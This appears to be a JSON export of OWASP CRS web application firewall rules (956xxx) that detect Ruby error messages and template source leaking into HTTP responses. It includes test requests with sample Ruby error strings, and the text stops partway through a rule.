[ { "rule_id": "956010", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_HEADERS", "part": "Content-Encoding", "negated": false } ], "operator": { "type": "@pm", "argument": "gzip compress deflate br zstd", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS", "OWASP_CRS/DATA-LEAKAGES-RUBY" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 16, "variables": [ { "variable": "RESPONSE_HEADERS", "variable_part": "Content-Encoding", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "gzip compress deflate br zstd", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "956010", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 19, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 20, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 21, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 22, "act_quote": "quotes", "act_arg": "OWASP_CRS/DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 23, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 24, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 16 } }, { "rule_id": "956011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 26, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 26, "act_quote": "no_quote", "act_arg": "956011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 26, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 26, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 26 } }, { "rule_id": "956012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 27, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 27, "act_quote": "no_quote", "act_arg": "956012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 27, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 27, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 27 } }, { "rule_id": "956100", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@pmFromFile", "argument": "ruby-errors.data", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "RUBY Information Leakage", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-disclosure" ], "severity": "ERROR", "tags": [ "application-multi", "language-ruby", "platform-multi", "attack-disclosure", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/DATA-LEAKAGES-RUBY", "capec/1000/118/116" ] }, "test_cases": [ { "description": "Ruby SyntaxError", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"SyntaxError (/path/to/your/app/controllers/reflects_controller.rb:10: syntax error, unexpected keyword_end)\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"SyntaxError (/path/to/your/app/controllers/reflects_controller.rb:10: syntax error, unexpected keyword_end)\"}" } ] }, { "description": "Ruby NameError", "test_id": 2, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"NameError (undefined local variable or method `unexistent_variable' for #<PostsController:0x00007f...>\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"NameError (undefined local variable or method `unexistent_variable' for #<PostsController:0x00007f...>\"}" } ] }, { "description": "Ruby ActiveRecord::RecordNotFound", "test_id": 3, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"ActiveRecord::RecordNotFound (Couldn't find Post with 'id'=999)\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"ActiveRecord::RecordNotFound (Couldn't find Post with 'id'=999)\"}" } ] }, { "description": "Ruby ActionView::Template::Error", "test_id": 4, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"ActionView::Template::Error (undefined method 'name' for nil:NilClass)\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"ActionView::Template::Error (undefined method 'name' for nil:NilClass)\"}" } ] }, { "description": "Ruby TypeError", "test_id": 5, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"TypeError: no implicit conversion of String into Integer\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"TypeError: no implicit conversion of String into Integer\"}" } ] }, { "description": "Ruby NoMethodError", "test_id": 6, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"NoMethodError: undefined method 'author_name' for #\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"NoMethodError: undefined method 'author_name' for #\"}" } ] }, { "description": "Ruby ArgumentError", "test_id": 7, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"ArgumentError: wrong number of arguments (given 0, expected 1)\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"ArgumentError: wrong number of arguments (given 0, expected 1)\"}" } ] }, { "description": "Ruby ActionController::RoutingError", "test_id": 8, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"ActionController::RoutingError: No route matches [GET] \"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"ActionController::RoutingError: No route matches [GET] \"}" } ] }, { "description": "Ruby ActionController::ParameterMissing", "test_id": 9, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"ActionController::ParameterMissing: param is missing or the value is empty: comment\"}" }, "expected": { "should_block": true, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"ActionController::ParameterMissing: param is missing or the value is empty: comment\"}" } ] }, { "description": "False Positive: Roundcube defining error message for frontend, matching `loaderror` in `fileuploaderror`", "test_id": 10, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "text/html" }, "data": "{\"fileuploaderror\":\"File upload failed.\"}" }, "expected": { "should_block": false, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"fileuploaderror\":\"File upload failed.\"}" } ] }, { "description": "False Positive: SOGo defining error message for frontend, matching `scriptError` in `noJavascriptError`", "test_id": 11, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "text/html" }, "data": "{ \"noJavascriptError\":\"SOGo requires Javascript to run. Please make sure this option is available and activated within your browser preferences.\" }" }, "expected": { "should_block": false, "rule_ids": [ 956100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{ \"noJavascriptError\":\"SOGo requires Javascript to run. Please make sure this option is available and activated within your browser preferences.\" }" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 35, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pmFromFile", "operator_argument": "ruby-errors.data", "actions": [ { "act_name": "id", "lineno": 36, "act_quote": "no_quote", "act_arg": "956100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 37, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 38, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 39, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 40, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 41, "act_quote": "quotes", "act_arg": "RUBY Information Leakage", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 42, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 43, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 44, "act_quote": "quotes", "act_arg": "language-ruby", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 45, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 46, "act_quote": "quotes", "act_arg": "attack-disclosure", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 47, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 48, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 49, "act_quote": "quotes", "act_arg": "OWASP_CRS/DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 50, "act_quote": "quotes", "act_arg": "capec/1000/118/116", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 51, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 52, "act_quote": "quotes", "act_arg": "ERROR", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 53, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 35 } }, { "rule_id": "956110", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Ruby source code leakage", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-disclosure" ], "severity": "ERROR", "tags": [ "application-multi", "language-ruby", "platform-multi", "attack-disclosure", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/DATA-LEAKAGES-RUBY", "capec/1000/118/116" ] }, "test_cases": [ { "description": "Ruby ERB Template leakage", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"<% end %>\"}" }, "expected": { "should_block": true, "rule_ids": [ 956110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"<% end %>\"}" } ] }, { "description": "Ruby ERB Template leakage", "test_id": 2, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"

Name: <%= @user.name %>

\"}" }, "expected": { "should_block": true, "rule_ids": [ 956110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"

Name: <%= @user.name %>

\"}" } ] }, { "description": "Ruby Slim Interpolation", "test_id": 3, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"p Name: #{user.name}\"}" }, "expected": { "should_block": true, "rule_ids": [ 956110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"p Name: #{user.name}\"}" } ] }, { "description": "False Positive: Don't match templates for WordPress site customizer", "test_id": 4, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "text/html" }, "data": "<%- sidebar.id %>" }, "expected": { "should_block": false, "rule_ids": [ 956110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "<%- sidebar.id %>" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 60, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})", "actions": [ { "act_name": "id", "lineno": 61, "act_quote": "no_quote", "act_arg": "956110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 62, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 63, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 64, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 65, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 66, "act_quote": "quotes", "act_arg": "Ruby source code leakage", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 67, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 68, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 69, "act_quote": "quotes", "act_arg": "language-ruby", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 70, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 71, "act_quote": "quotes", "act_arg": "attack-disclosure", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 72, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 73, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 74, "act_quote": "quotes", "act_arg": "OWASP_CRS/DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 75, "act_quote": "quotes", "act_arg": "capec/1000/118/116", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 76, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 77, "act_quote": "quotes", "act_arg": "ERROR", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 78, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 60 } }, { "rule_id": "956013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 81, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 81, "act_quote": "no_quote", "act_arg": "956013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 81, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 81, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 81, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 81, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 81, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 81, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 81 } }, { "rule_id": "956014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 82, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 82, "act_quote": "no_quote", "act_arg": "956014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 82, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 82, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 82, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 82, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 82, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 82, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 82 } }, { "rule_id": "956015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 85, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 85, "act_quote": "no_quote", "act_arg": "956015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 85, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 85, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 85, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 85, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 85, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 85, "act_quote": "no_quote", "act_arg": "END-RESPONSE-956-DATA-LEAKAGES-RUBY", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 85 } }, { "rule_id": "956016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 86, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", 